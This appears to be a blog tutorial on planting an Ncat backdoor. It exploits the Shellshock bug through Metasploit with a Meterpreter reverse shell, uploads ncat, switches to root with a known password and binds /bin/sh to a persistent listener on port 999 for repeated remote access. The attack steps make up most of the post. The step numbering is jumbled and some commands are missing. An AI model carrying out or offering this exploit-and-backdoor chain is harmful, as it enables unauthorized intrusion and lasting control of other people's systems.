• Lucifer

Using Ncat as a trojan

Ncat has been used as a Telnet replacement up until now. Instead of using Ncat to connect to other computers, we can also set up Ncat to listen mode. Listen mode allows us to install Ncat on a compromised machine, run it on any port of our choosing, and then connect to it with another copy of Ncat on our attacking computer. We can start Ncat in listen mode and then bind the bash shell to it, allowing us to pass commands to the target host. Also, we can freely disconnect and reconnect to the listening Ncat on the target system. So let's take a look without any further delay that how we can use Ncat as a trojan.

Using Ncat as a trojan

Step 1: Copying Ncat

First, let's copy the Ncat binary to our home folder:

cp /usr/bin/ncat ~

Using Ncat as a trojan

Step 2: Staring Metasploit Framework

Now we will compromise our target the same way we did in earlier posts: by exploiting the Shellshock vulnerability with Metasploit Framework.

Start the Metasploit Framework:

msfconsole -L

Using Ncat as a trojan

Step 3: Selecting Exploit Module

Select the Shellshock exploit module:

use exploit/multi/http/apache_mod_cgi_bash_env_exec

Using Ncat as a trojan

Step 4: Selecting Payload

As you may remember from earlier posts, Meterpreter, one of the most powerful Metasploit payloads, has an easy file upload feature. So let's use Meterpreter to transfer Ncat to our target. Select Meterpeter payload as follows:

set PAYLOAD linux/x86/meterpreter/reverse_tcp

Using Ncat as a trojan

Step 6: Setting Options: RHOST, TARGETURI, LHOST

Now start configuring the exploit options. Again, RHOST is our target (remote), host:

set RHOST skillsetlocal.com

Using Ncat as a trojan

The TARGETURI value points to the vulnerable script on the target system:

set TARGETURI /cgi-bin/vulnscript.sh

Using Ncat as a trojan

Finally, LHOST is the local IP that Meterpreter will connect back to:


Using Ncat as a trojan

Step 5: Running Exploit

Let's run the exploit.


Using Ncat as a trojan

You should get a Meterpreter shell prompt.

Step 6: Uploading Ncat

Now we will transfer Ncat to the target with the Meterpreter's upload command:

upload ncat

Using Ncat as a trojan

Step 7: Getting a Shell

Now we need to start Ncat in listen mode. First, open a command shell from Meterpreter:


Using Ncat as a trojan

Step 8: Switching to root

We will need elevated privileges to run Ncat. Let's assumed that we already obtained the root password for the target (using one of the techniques we covered in other posts). Enter the following command to switch to root:

su root

Using Ncat as a trojan

Enter password123 when prompted.

Now we can start Ncat.

Step 9: Starting Ncat Listener

The command below will start Ncat in listen mode. The -k option forces it to stay in listening mode even when a client disconnects (this is an important option). The -p option selects the port and the -e binds the command shell to the selected port.

ncat -l -p 999 -k -e /bin/sh

Using Ncat as a trojan

We are done here. Our Trojan backdoor is set up, and now we can get access to the target system whenever we want. Hit Crtl+C and enter y to return to the prompt. Enter exit twice to close the Metasploit Framework.

Step 10: Connecting to Listener

Let's see if we can connect to the listener. Enter the following command:

ncat skillsetlocal.com 999

Using Ncat as a trojan

You have command line access to the target. Try entering an OS command to verify (you won't see any kind of prompt, just enter the command in the new line):

whoami Neat. You can try disconnecting (press Ctrl+C) and re-connecting (re-enter the Ncat command). The connection stays open.

Also read: Post-Exploit Password Cracking

That's it for this post hope you like it, please share it with your friends and more amazing stuff is waiting for you, checkout shop at Payground or visit HERE.

Join Telegram Group

©2020 by Payground. Proudly created with Wix.com